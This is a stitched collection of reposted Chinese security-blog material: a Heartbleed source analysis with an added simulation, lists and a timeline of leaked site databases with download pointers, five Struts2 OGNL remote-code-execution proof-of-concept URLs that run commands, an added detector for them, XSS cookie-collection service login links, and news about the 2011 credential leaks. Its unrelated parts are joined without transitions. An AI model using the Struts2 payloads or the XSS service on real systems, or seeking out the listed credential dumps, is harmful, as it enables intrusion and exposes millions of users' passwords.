existential type crisis : Diagnosis of the OpenSSL Heartbleed Bug

When I wrote about the GnuTLS bug, I said that it wouldn't be the last severe TLS stack bug we'd see. I didn't expect the next one to be quite this bad, however.

The Heartbleed bug is a particularly nasty one. It lets an unauthenticated peer read up to 64KB of the process's memory per heartbeat request, and nothing stops the attacker from sending as many requests as they like. The researchers who disclosed it wrote:

Without using any privileged information or credentials we were able to steal from ourselves the secret keys used for our X.509 certificates, user names and passwords, instant messages, emails and business critical documents and communication.

How could this happen? Let’s read the code and find out.

The bug

The fix starts here, in ssl/d1_both.c (the TLS twin of this function, tls1_process_heartbeat in ssl/t1_lib.c, has the same logic and received the same fix):

int
dtls1_process_heartbeat(SSL *s)
    {
    unsigned char *p = &s->s3->rrec.data[0], *pl;
    unsigned short hbtype;
    unsigned int payload;
    unsigned int padding = 16; /* Use minimum padding */

So, first we get a pointer to the data within an SSLv3 record. That looks like this:

typedef struct ssl3_record_st
    {
        int type;               /* type of record */
        unsigned int length;    /* How many bytes available */
        unsigned int off;       /* read/write offset into 'buf' */
        unsigned char *data;    /* pointer to the record data */
        unsigned char *input;   /* where the decode bytes are */
        unsigned char *comp;    /* only used with decompression - malloc()ed */
        unsigned long epoch;    /* epoch number, needed by DTLS1 */
        unsigned char seq_num[8]; /* sequence number, needed by DTLS1 */
    } SSL3_RECORD;

Records have a type, a length, and data. Back to dtls1_process_heartbeat:

/* Read type and payload length first */
hbtype = *p++;
n2s(p, payload);
pl = p;

The first byte of the SSLv3 record is the heartbeat type. The macro n2s takes the next two bytes from p and puts them in payload. This is the length of the payload, as claimed by the peer. Note that nothing compares it against rrec.length, the number of bytes the record actually contains.

The variable pl then points at the heartbeat payload, as supplied by the requester.

Later in the function, it does this:

unsigned char *buffer, *bp;
int r;

/* Allocate memory for the response, size is 1 byte
 * message type, plus 2 bytes payload length, plus
 * payload, plus padding
 */
buffer = OPENSSL_malloc(1 + 2 + payload + padding);
bp = buffer;

So we're allocating as much memory as the requester asked for: up to 65535+1+2+16 bytes, to be precise. The variable bp is the pointer used to write into this memory. Then:

/* Enter response type, length and copy payload */
*bp++ = TLS1_HB_RESPONSE;
s2n(payload, bp);
memcpy(bp, pl, payload);

The macro s2n does the inverse of n2s: it writes a 16-bit value into two bytes. So the response carries the same payload length the requester claimed.

Then it copies payload bytes from pl, the user-supplied data, into the newly allocated bp buffer. After this, it sends the whole thing back to the user. So where's the bug?

The user controls payload and pl

What if the requester didn't actually supply the payload bytes she said she did? What if pl really is only one byte long? Then memcpy reads payload bytes anyway: the one real byte, followed by whatever happens to sit after the SSLv3 record in the same process's memory. All of it goes back in the response.

And apparently, there’s a lot of stuff nearby.

There are two ways memory is dynamically allocated with malloc (at least on Linux with glibc): using sbrk(2) and using mmap(2). If the memory is allocated with sbrk, then it uses the old heap-grows-up rules, which limits what can be found this way, although multiple requests (especially simultaneous ones) could still find some fun stuff[1].

The allocation for bp doesn't matter at all, actually. The allocation for pl, however, matters a great deal. It's almost certainly allocated with sbrk because of the mmap threshold in malloc (M_MMAP_THRESHOLD, 128KB by default; only larger requests go to mmap). However, interesting stuff (like documents or user info) is very likely to be allocated with mmap and might be reachable from pl. Multiple simultaneous requests will also make some interesting data available.

And, as the reports mentioned in the footnote show, your private keys can be among the data recovered.

The fix

The most important part of the fix was this:

/* Read type and payload length first */
if (1 + 2 + 16 > s->s3->rrec.length)
    return 0; /* silently discard */
hbtype = *p++;
n2s(p, payload);
if (1 + 2 + payload + 16 > s->s3->rrec.length)
    return 0; /* silently discard per RFC 6520 sec. 4 */
pl = p;

This does two things. The first check discards any record shorter than the 19 bytes needed for the type, the length field and the 16 bytes of minimum padding, which also disposes of zero-length heartbeats. The second check compares the claimed payload length (plus header and padding) against rrec.length, the number of bytes the record actually contains, and silently discards the record if the claim is larger, as RFC 6520 section 4 requires. That's it: memcpy can no longer read past what the peer really sent.
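As an added example (not code from the original post or from OpenSSL), here is the heartbeat handling above transcribed into Python with the two checks from the fix switchable, run against a constructed byte string that stands in for the process's memory. Record, process_heartbeat, build_record and the SECRET bytes are my names and stand-ins; a real memcpy reads whatever is physically adjacent on the heap, which this buffer only imitates.

```python
import struct
from typing import Optional

TLS1_HB_REQUEST = 1
TLS1_HB_RESPONSE = 2
MIN_PADDING = 16                      # the "16" in the patch: RFC 6520 minimum padding


class Record:
    """Stand-in for s->s3->rrec. `mem` is the memory the record lives in (the
    record starts at offset 0); `length` is how many bytes the record layer
    actually received, the value the patch compares against."""
    def __init__(self, mem: bytes, length: int):
        self.mem = mem
        self.length = length


def process_heartbeat(rec: Record, patched: bool) -> Optional[bytes]:
    """Mirror of dtls1_process_heartbeat. Returns the response, or None if the
    record is discarded. `patched` enables the two length checks from the fix."""
    p = 0
    if patched and 1 + 2 + 16 > rec.length:
        return None                   # too short for type + length + padding
    hbtype = rec.mem[p]
    p += 1
    payload = struct.unpack_from("!H", rec.mem, p)[0]   # n2s: peer-claimed length
    p += 2
    if patched and 1 + 2 + payload + 16 > rec.length:
        return None                   # claim exceeds what was actually received
    pl = p
    if hbtype != TLS1_HB_REQUEST:
        return None
    # Unpatched, this is memcpy(bp, pl, payload): when payload is larger than
    # the bytes the peer sent, the copy runs past the record into adjacent memory.
    copied = rec.mem[pl:pl + payload]
    return (bytes([TLS1_HB_RESPONSE]) + struct.pack("!H", payload)   # s2n
            + copied + b"\x00" * MIN_PADDING)


# Constructed stand-in for unrelated data sitting next to the record buffer.
SECRET = b"-----BEGIN RSA PRIVATE KEY-----"


def build_record(claimed: int, supplied: bytes) -> Record:
    """A heartbeat request whose length field says `claimed` bytes but which
    carries only `supplied`, followed in memory by data it should never see."""
    record = (bytes([TLS1_HB_REQUEST]) + struct.pack("!H", claimed)
              + supplied + b"\xaa" * MIN_PADDING)
    mem = record + SECRET + b"\x00" * 65536   # room for a 0xffff claim to stay in bounds
    return Record(mem, len(record))


def leaks_secret(claimed: int, supplied: bytes, patched: bool) -> bool:
    """True if the response to the crafted request contains the adjacent secret."""
    resp = process_heartbeat(build_record(claimed, supplied), patched)
    return resp is not None and SECRET in resp


if __name__ == "__main__":
    for patched in (False, True):
        print("patched  " if patched else "unpatched",
              "leaks" if leaks_secret(0xFFFF, b"ping", patched) else "safe")
```

An honest request (claimed length equal to the bytes sent) gets the same 23-byte echo from both versions; only the lying request is affected by the checks.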

Lessons

What can we learn from this?

I’m a fan of C. It was my first programming language and it was the first language I felt comfortable using professionally. But I see its limitations more clearly now than I have ever before.

Between this and the GnuTLS bug, I think that we need to do three things:

  1. Pay money for security audits of critical security infrastructure like OpenSSL
  2. Write lots of unit and integration tests for these libraries
  3. Start writing alternatives in safer languages

Given how difficult it is to write safe C, I don’t see any other options. I would donate to this effort. Would you?


  1. This section originally contained my skepticism about the feasibility of a PoC due to the nature of how the heap works via sbrk. Neel Mehta has validated some of my concerns, but there are many reports of secret key discovery out there.

Sean is a software engineer who is passionate about doing things right. He is currently working on Squadron: an awesome configuration and release management tool for SaaS applications.

List of leaked site databases

51cto数据库.zip
2008普查地区1.rar
2008普查地区1.zip
caigame_useraccounts赌博.rar
CNbeta数据库.tgz
CNZZ数据库.rar
CSDN数据库.zip
eNet数据库.rar
gg.zip
IS数据库.kz
mail.rar
me.zip
VVV9.rar
TT数据库.zip
爱慕.zip
百合网数据库.zip
多玩库.rar
湖北模特.rar
佳品网.zip
金山毒霸.zip
开心网.rar
美空数据库.zip
世纪家园数据库.zip
天涯数据库.zip
图虫网.zip
西游傲剑.rar
信息学院数据库.rar
珍爱网数据库.zip
走秀网.rar
7k7k2000w.sql
51cto.com.sql
cnzz.com.sql
duowang_800w.sql
facebook_user.sql
jiayuan20110312.sql
meikong.sql
php.com.sql
renren201103.sql
sina20090818.sql
www.csdn.net.sql
yy.com.sql
51CTO20110620.rar
360buy.com20111129.sql
cnbeta.com.sql
Discuz.net20110909.sql
dzh.mop.com.sql
hotmail.com(部分).rar
jiayuan.com20110909.sql
kaixin.com20110401.sql
php.net.rar
renren.com20111111.sql
tianya.com2010.sql
weibo.com20110220.sql
youku.com20080504.rar
zhenai.com_20111103.sql
51job.com.sql
alipay.com20100908.sql
CNZZ.com.sql
douban.com20101222.sql
facebook_mail_20111011.sql
it168.com_user_mail20090808.sql
job.dajie.com.rar
mysql.de.rar
PHPWind20101111.sql
sougou_bbs2011.sql
tudou_VIP_20110103.sql
zhaopin.com.rar

 

December 21, 2011: password leaks suddenly appear online...

Dec 21: CSDN's 6.4 million user accounts, passwords and e-mail addresses leaked by hackers

Dec 22: major well-known Chinese sites fall one after another; the scope is very wide and the leaked data touches many user-facing services

A password-security crisis sweeping all of China has broken out.

Dec 23: confirmed: CSDN leaked; Duowan leaked; Fantasy Westward Journey (梦幻西游) accounts leaked via a trojan; Renren partially leaked

Dec 23: netizens report that Tianya has fallen; the 7K7K archive contains Tianya account passwords

Dec 24: 178 and UUU9 fall; the situation spreads (vendors notified)

Dec 24, 15:30: Tianya fully compromised; as many as 9 million account records leaked

Dec 24, 17:00: NetEase's co188 (土木在线) also falls; the volume of data is staggering

Dec 25: Baidu suspected of leaking account information through its open account platform

Dec 25: Beijing Qilin Network (北京麒麟网信息科技有限公司) suspected of leaking Baidu and PPLive accounts and passwords, plus all of its own account data (vendor notified)

Dec 25: UUU9.COM's database dumped by hackers twice (vendor notified)

Dec 25: rumours circulate online that a Tencent database has leaked

Dec 25: escalation; Tianya suspected of leaking 40 million user records

Dec 25: 178's database dumped a second time, 1.1 million records leaked

Dec 25: Mumayi (木蚂蚁) reported to have leaked hashed user data, about 130,000 records (vendor notified, fix in progress)

Dec 25, 23:32: 5,261,302 account records from a well-known dating site confirmed (vendor notified, vendor has applied a technical block)

Dec 26: MySpace leak; Xunlei has offline-fetched three more leak archives

Dec 26, 9:47: iSpeak account data leaked and verified; the operator should tell members to change their passwords

Dec 26, 11:36: in the circulating archive 17173.7z, file 17173.0 holds 178 account data; 178 has now been dumped three times, 2 million records leaked

Dec 26, 11:43: in 17173.7z, file 17173.3 holds UUU9.COM account data; volume unknown

Dec 26, 23:17: the Symbian smartphone forum (塞班智能手机网) data verifies at a 70% hit rate; the site has most likely fallen

Dec 27, 1:44: NetEase co188 forum passwords verified by cross-matching, user data all genuine; 135 files, 4.31 GB in total; the leak apparently dates to 2011-07-09 15:09:11 (notified by forum post, no vendor response)

Dec 27: 178.com completely compromised, more than 11 million records leaked in total

Dec 27: 766 leak verified, over 100,000 records

Dec 27: ys168 leak verified, over 300,000 records

Dec 27: new leak archives appear online; Kingsoft's JX Online (金山剑网) suspected hit, and there is more leaked data; which sites will fall next?

Dec 27: Honker Union (红客联盟) suspected hit; leaked IDs all match

Dec 27: JD.com (京东商城) user information leaked

Dec 27: the three e-commerce sites Vancl, Dangdang and Amazon China (卓越) fall; 500,000 records of real user information leaked

Dec 29: the Internet is no longer safe; contact details of executives at Chinese IT companies may have leaked, involving nearly 30 companies including Sony China, Shanda, NetEase, Baidu, Google, Tencent, Youku, Yahoo, eBay, TOM, Newegg, Ctrip, Tudou, Taobao, Sohu, 51job, Alibaba, Zhaopin and ChinaHR
Dec 29: I think the public security organs and related departments need to step up and crack down on the crackers who sully the craft. These leaks are profit-making at the expense of personal privacy; as a site owner I constantly get sales calls from insurance companies, real-estate agents and brokers, and from scammers too. For now there is no need to blame all of this on the authorities (though they do bear some responsibility), because I have heard that certain crackers make a living from this and break into provincial-level databases; I think you all know which databases I mean. I hope the government strengthens security management, and that administrators stop using passwords like 123 and abc forever.
Dec 29: hackers break into Mengniu's official site and gain server access; the server is shut down 20 minutes later
Dec 29: this afternoon we will confirm whether a certain DNS resolution service has been compromised
Dec 29: MIIT strongly condemns the theft and leaking of user information
Dec 29: Facebook hit by a leak: 100 million user records packaged for download. China's Internet is not safe, and neither, in fact, is anyone else's
Dec 29: Taobao suspected of leaking account data, four files SN1-SN4; only rumour so far, cannot confirm
Dec 29: confirmed: SN1-SN4 are Sina users (accounts pieced together)
Dec 29: DNSPod confirms a leak
Dec 29: 52PK leaks 1.2 million records
Dec 29: iSpeak leak rises to 10 million
Dec 29: rumoured: Dangdang user data leak rises to 12 million
Dec 29: rumoured: data from several banks leaked; netizens reportedly tested transfers successfully

File name  Size  Notes
CSDN-中文IT社区-600万.rar  104.85MB
人人网500W_16610.rar  49.56MB
178(1000w)_3087.rar  103.51MB
多玩网_800W.rar  216.91MB
7k7k2000万_2047.rar  194.21MB
嘟嘟牛_66277.rar  205.68MB
weibo.com_12160.rar  49.5 MB  Sina Weibo weibo.com
天涯数据.kz  377 MB  Tianya community database tianya.cn
766_16368.rar  101 MB  766 games 766.com
766+开心.rar  109 MB  766.com + Kaixin (Symbian smartphone forum)
1000W+IS2_16436.rar  157 MB  iSpeak IS voice chat
aipai_1156.zip  265 MB  Aipai games aipai.com
co188_87383.zip  661 MB  NetEase co188 (土木在线)
mumayi.com数据库.rar  8.14 MB  Mumayi mumayi.com
u_766_com_20110519_2717_11.rar  4.79 MB  766 UCenter database
17173.7z  409 MB  circulating archive; 17173.0 inside is 178 account data, 17173.3 is UUU9.COM account data

CSDN: 6,428,632 accounts leaked. Fields: username, plaintext password, e-mail
Duowan: 8,305,005 accounts leaked. Fields: username, MD5-hashed password, some plaintext passwords, e-mail, Duowan nickname
178.COM: 1,883,487 accounts leaked and rising. Fields: username, MD5-hashed password, all plaintext passwords, e-mail, 178 nickname (178 accounts are shared with NGA)
Tianya: 9,695,513 accounts leaked (expected to exceed 40 million). Fields: username, plaintext password, e-mail
Renren: 4,768,600 accounts leaked. Fields: plaintext password, e-mail
UUU9.COM: 7,513,773 accounts leaked. Fields: username, MD5-hashed password, some plaintext passwords, e-mail, U9 nickname
NetEase co188: about 4.3 GB in 137 files. Fields: username, e-mail, MD5-hashed password, other related data
Fantasy Westward Journey: about 1.4 GB (stolen by a trojan). Fields: username, e-mail, plaintext password, character name, server, last login time, last login IP
Weibo (WEIBO.COM): unknown number of accounts, one suspected file. Fields: e-mail, plaintext password
Beijing Qilin Network: 9,072,966 accounts leaked. Fields: username, plaintext password
Well-known dating site: 5,261,302 accounts leaked. Fields: username, plaintext password
Ispeak.CN: 1,680,271 accounts leaked. Fields: username, plaintext password, nickname
Mumayi: about 130,000 accounts leaked. Fields: username, hashed password, database row ID, other data
Symbian forum: about 1.4 million accounts leaked. Fields: username, plaintext password, e-mail
766.COM: about 120,000 accounts leaked. Fields: username, md5(md5(pwd).salt) password hash, salt, e-mail, database row ID

The above is from http://csdn.aspx2.com/

The links below were collected from the web: eDonkey ed2k://|file| links, Xunlei thunder:// links, or cloud-drive downloads, provided only so you can check whether your own information is included, and for research.

A collection of the recent password leaks; match the contents against the leak timeline above, and see the other pages if something is missing.

Download links (all now dead):

CSDN-中文IT社区-600万.rar: Shanda cloud drive / eDonkey

多玩网_800W.rar: Shanda cloud drive / eDonkey

人人网500W_16610.rar: Shanda cloud drive / eDonkey

嘟嘟牛_66277.rar: Shanda cloud drive / eDonkey

7k7k2000万_2047.rar: Shanda cloud drive / eDonkey

178(1000w)_3087.rar: Shanda cloud drive / eDonkey

The following are direct file links; Xunlei can be used to speed them up.
天涯社区_tianya.zip
766_16368.rar
766+kaixin.rar
1000W+IS2_16436.rar
爱拍_aipai_1156.zip
co188_87383.zip
mumayi.com.rar
u_766_com_20110519_2717_11.rar
新浪微博_weibo.com.rar
多玩YY_duowan.rar
7k7k游戏_7k7k.rar
嘟嘟牛_duduniu.rar
CSDN_csdn.rar
人人网_renren.rar
178游戏_178.rar
17173.7z

The following items from the leaked screenshot were not found:

51cto数据库.zip
cnBeta数据库.tgz
CNZZ数据库.rar
eNet数据库.rar
金山毒霸.zip
开心网.rar
美空数据库.zip
百合网数据库.zip
世纪佳缘数据库.zip
珍爱网数据库.zip
走秀网.rar
51CTO20110620.rar
360buy.com20111129.sql
cnbeta.com.sql
Discuz.net20110909.sql
dzh.mop.com.sql
hotmail.com(部分).rar
jiayuan.com20110909.sql
kaixin.com20110401.sql
php.net.rar
renren.com20111111.sql
tianya.com2010.sql
weibo.com20110220.sql
youku.com20080604.rar
zhenai.com_20111103.sql
51job.com.sql
CNZZ.com.sql
douban.com20101222.sql
facebook_mail_20111011.sql
it168.com_user_mail20090808.sql
job.dajie.com.rar
mysql.de.rar
PHPWind20101111.sql
sougou_bbs2011.sql
tudou.com200910.sql
xunlei_VIP_20110103.sql
zhaopin.com.rar
alipay.com20100908.sql
当当,凡客,卓越用户资料.zip
当当数据10万条.xlsx
凡客数据测试数据.xls
卓越测试数据20万条.xls
Other pages also carry Xunlei thunder://, eDonkey ed2k://|file|, cloud-drive and BitTorrent downloads.

 

Permalink: http://www.cutsoul.com/221.html | Cut Your Soul, Let It Be.

Struts2: five remote code execution PoCs

Exploit code:
Detection (each PoC calls Thread.sleep(5000); a vulnerable server answers about 5 seconds late):
POC1:
http://127.0.0.1/Struts2/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(d)(('@java.lang.Thread@sleep(5000)')(d))

POC2:
http://127.0.0.1/Struts2/test.action?id='%2b(%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Thread@sleep(5000))%2b'

POC3:
http://127.0.0.1/Struts2/hello.action?foo=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,@java.lang.Thread@sleep(5000))(meh%29&z[%28foo%29%28%27meh%27%29]=true

POC4:
http://127.0.0.1/Struts2/hello.action?class.classLoader.jarPath=(%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean(false)%2c+%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.Thread@sleep(5000))(aa)&x[(class.classLoader.jarPath)('aa')]

POC5 (the expression is evaluated twice, so the delay is 10 seconds):
http://127.0.0.1/Struts2/hello.action?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Thread@sleep(5000)}

Command execution:
On output: the buffer webStr\75new\40byte[100] should be resized to fit the command's output.
POC1:
http://127.0.0.1/Struts2/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[100]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=cmd%20/c%20ipconfig

POC2:
http://127.0.0.1/Struts2/test.action?id='%2b(%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[100],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%23result))%2b'&cmd=cmd%20/c%20ipconfig

POC3:
http://127.0.0.1/freecms/login_login.do?user.loginname=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=%20new%20java.lang.Boolean(false),%23_memberAccess[%22allowStaticMethodAccess%22]=new%20java.lang.Boolean(true),%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[1000],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%23result))&z[(user.loginname)('meh')]=true&cmd=cmd%20/c%20set

POC4:
http://127.0.0.1/Struts2/test.action?class.classLoader.jarPath=(%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d=+new+java.lang.Boolean(false),%23_memberAccess%5b%22allowStaticMethodAccess%22%5d=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23a=%40java.lang.Runtime%40getRuntime().exec(%23req.getParameter(%22cmd%22)).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5b50000%5d,%23c.read(%23d),%23s3cur1ty=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23s3cur1ty.println(%23d),%23s3cur1ty.close())(aa)&x[(class.classLoader.jarPath)('aa')]&cmd=cmd%20/c%20netstat%20-an

POC5:
http://127.0.0.1/Struts2/hello.action?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[1000],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%23result),%23response.close()}&cmd=cmd%20/c%20set
Screenshots as proof (three images, not reproduced here).
http://ahack.iteye.com/blog/1858871
http://ahack.iteye.com/blog/1873005
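As an added example (not code from the original post or from Struts), here is the detection side of these PoCs: a normalizer that undoes the encodings the payloads rely on (repeated URL-encoding, the OGNL octal escapes \43, \75 and \40, copy-pasted curly quotes) and then looks for the sandbox-manipulation markers every one of the five PoCs shares. The INDICATORS list, the two-marker threshold and the benign request are my choices; POCS holds the five detection URLs quoted above with ASCII quotes.

```python
from urllib.parse import unquote

# OGNL accepts octal escapes inside string literals; the PoCs above use
# \43 '#', \75 '=' and \40 ' ' to slip past filters that look for the raw characters.
OCTAL_ESCAPES = {"\\43": "#", "\\75": "=", "\\40": " "}

# Substrings (matched case-insensitively after decoding) that no legitimate
# Struts request parameter contains. Each PoC above hits several of them.
INDICATORS = (
    "#_memberaccess",          # the OGNL sandbox flags object
    "#context[",               # xwork.MethodAccessor.denyMethodExecution lives here
    "allowstaticmethodaccess",
    "denymethodexecution",
    "@java.lang.",             # static call syntax @class@method(), e.g. Thread.sleep / Runtime.exec
    "@org.apache.struts2.",    # ServletActionContext for request/response access
    "class.classloader",       # ParametersInterceptor bypass through the class loader
    "${",                      # expression evaluated when a value is re-rendered
)


def normalize(query: str) -> str:
    """Undo what an attacker can apply: up to three rounds of URL-decoding,
    the OGNL octal escapes, curly quotes from copy-pasted PoCs, and case."""
    s = query
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    for esc, ch in OCTAL_ESCAPES.items():
        s = s.replace(esc, ch)
    return s.replace("\u2018", "'").replace("\u2019", "'").lower()


def ognl_indicators(url: str) -> list:
    """Indicators present in the query string of a request URL."""
    query = url.split("?", 1)[1] if "?" in url else url
    text = normalize(query)
    return [i for i in INDICATORS if i in text]


def is_ognl_injection(url: str) -> bool:
    """Two independent markers are required so that a lone '${' typed into a
    search box does not trigger; the PoCs above all carry at least three."""
    return len(ognl_indicators(url)) >= 2


# The five detection PoCs quoted above (curly quotes replaced by ASCII ones).
POCS = [
    r"http://127.0.0.1/Struts2/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(d)(('@java.lang.Thread@sleep(5000)')(d))",
    r"http://127.0.0.1/Struts2/test.action?id='%2b(%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Thread@sleep(5000))%2b'",
    r"http://127.0.0.1/Struts2/hello.action?foo=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,@java.lang.Thread@sleep(5000))(meh%29&z[%28foo%29%28%27meh%27%29]=true",
    r"http://127.0.0.1/Struts2/hello.action?class.classLoader.jarPath=(%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean(false)%2c+%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.Thread@sleep(5000))(aa)&x[(class.classLoader.jarPath)('aa')]",
    r"http://127.0.0.1/Struts2/hello.action?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Thread@sleep(5000)}",
]
# Constructed benign request: one '${' alone must not be flagged.
BENIGN = "http://127.0.0.1/Struts2/hello.action?name=alice&page=2&q=${price}"

if __name__ == "__main__":
    for url in POCS + [BENIGN]:
        print(is_ognl_injection(url), ognl_indicators(url))
```

This classifies request strings only; the timing check (a sleep(5000) payload answered about five seconds late) is the confirmation step the PoCs themselves perform.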

xsser.me invitation codes | XSS cookie-collection system | XSS exploitation system

xsser.me / xsser.cc login:

www.ieroot.com/xsser/

Invitation links:

xsser

[Repost] cnzz database / Renren / Tianya / CNBETA / KU6 / u9 downloads: leaked databases with password and account information

 

 

According to a domestic hacker site, CSDN is by no means the only database to have been dumped and leaked; a large number of well-known Chinese sites are affected, such as Renren, uuu9.com, Duowan YY voice chat, ENET (硅谷动力), Baihe, Zhenai, Jiayuan, Kingsoft, Kaixin, Moko and Dangdang.

Hackers claim that the data of 8 million Duowan users, 20 million 7K7K mini-game users and 10 million 178.com users has already leaked, and some have published screenshots of the data archives, saying that a large batch of social sites including Renren (5 million), Kaixin, Tianya, Jiayuan and Baihe will be the next targets.

Screenshot published by the hackers

So far, a large amount of Duowan user data has been published online. The claims above, however, have not been officially confirmed.

According to some hacker sites, the CSDN leak did not come without warning: some hackers complain that they repeatedly reported vulnerabilities to CSDN and other well-known domestic sites without being taken seriously, and were even blacklisted outright, which in the end drove them to publish the vulnerabilities or the database contents.

Browsing hacker blogs and sites does bear this out: bugs and vulnerabilities such as XSS, CSRF, SNS worms, open redirects, weak admin-panel passwords, SQL injection, injection leading to root, DNS zone transfer and the latest overflow bugs are all mentioned, even at large companies such as Baidu, NetEase, Sina, Tencent, Sohu and Xunlei.

Some blog posts and forum threads are plainly full of resentment; one hacker said he reported several vulnerabilities and bugs to Tencent, which were accepted, yet he did not receive so much as a QQ penguin doll.

Another hacker railed at Xinnet: he reported a vulnerability to Xinnet's administrators, and half a year later it still had not been fixed; they even added him to their e-mail blacklist. He felt he had no choice but to download Xinnet's user database as evidence of the vulnerability.

One hacker wrote in a blog post that the problem is not that the systems have vulnerabilities, which is unavoidable in any larger system, but that the arrogant attitude common among Chinese Internet companies enraged them.

Foreign Internet companies not only treat hackers with respect, they invite them to visit, recruit them, have the CEO meet them personally, give gifts and cash and sponsor their events, all so that these demanding and sensitive hackers will report to the company first when they find a vulnerability, keeping the damage to a minimum.

Chinese Internet companies do the exact opposite: besides dodging the issue, many even call the police to arrest the hackers who reported vulnerabilities to them, and others post legal warnings on their sites to deter people from looking for bugs.

This drives hackers either to sell vulnerability information on the sly or to publish it outright, and the security climate for Chinese Internet companies has gone sharply downhill.

Shandian Blog (闪电博客) considers the exposure of CSDN's user passwords the worst domestic Internet security incident of this year, perhaps of recent years: 6 million published passwords go straight into cracking dictionaries, and there is no security left to speak of.

The hackers' motive for publishing the passwords is puzzling: reselling the 6 million records would have brought in money without causing the current uproar, and it is no secret that many sites' data has been traded back and forth in hacker circles before. Publishing 6 million records outright is something even Anonymous and LulzSec abroad have probably never done.

One cannot help sighing over passwords: you think they are secret, but they are actually transparent. Before, they may have sat in some QQ group or e-mail attachment with a price tag; now they are simply put on eDonkey for free download.

Programmers are asked to download and check the data; if you find your username in it, change the same password on your other accounts as soon as possible.

After the hackers released CSDN's 6 million usernames and passwords, 5 million Renren and 8 million Duowan usernames and passwords were released as well. The 8-million-user Duowan dump contains large numbers of usernames, plaintext passwords, e-mail addresses and some hashed passwords; @猫魅网络安全 (Maomei Network Security) says it verified that the usernames and passwords in the database log into Duowan normally.
Most usernames and passwords in the Renren dump, on the other hand, do not log in, so it remains to be verified.

This database-breach episode may not be so simple, though: CSDN and Duowan may be only the tip of the iceberg. The file screenshot released online (from @mmc66.com, Maomei Network Security) shows Kaixin, Moko, Jiayuan, Baihe and others in the list.

Update:

Renren has just responded: if your Renren password is the same as on CSDN or another site, change it immediately to avoid account theft. Renren has never stored plaintext passwords since launch. Users who use the same credentials on CSDN or other forums have Renren accounts at risk and should change them as soon as possible.

Kaixin has just responded: given the reports that several sites' user data has been published by hackers, Kaixin advises users that if your username and password on any site have been stolen, change your username and password on other sites promptly. Hackers use stolen credentials to probe other sites; if you use the same username and password everywhere, once one leaks the rest are easily found.

Sohu IT, Dec 22: since hackers publicly offered the CSDN user database for download yesterday, parts of the user databases of sites including Renren, Mop and Duowan have also been uploaded for download.

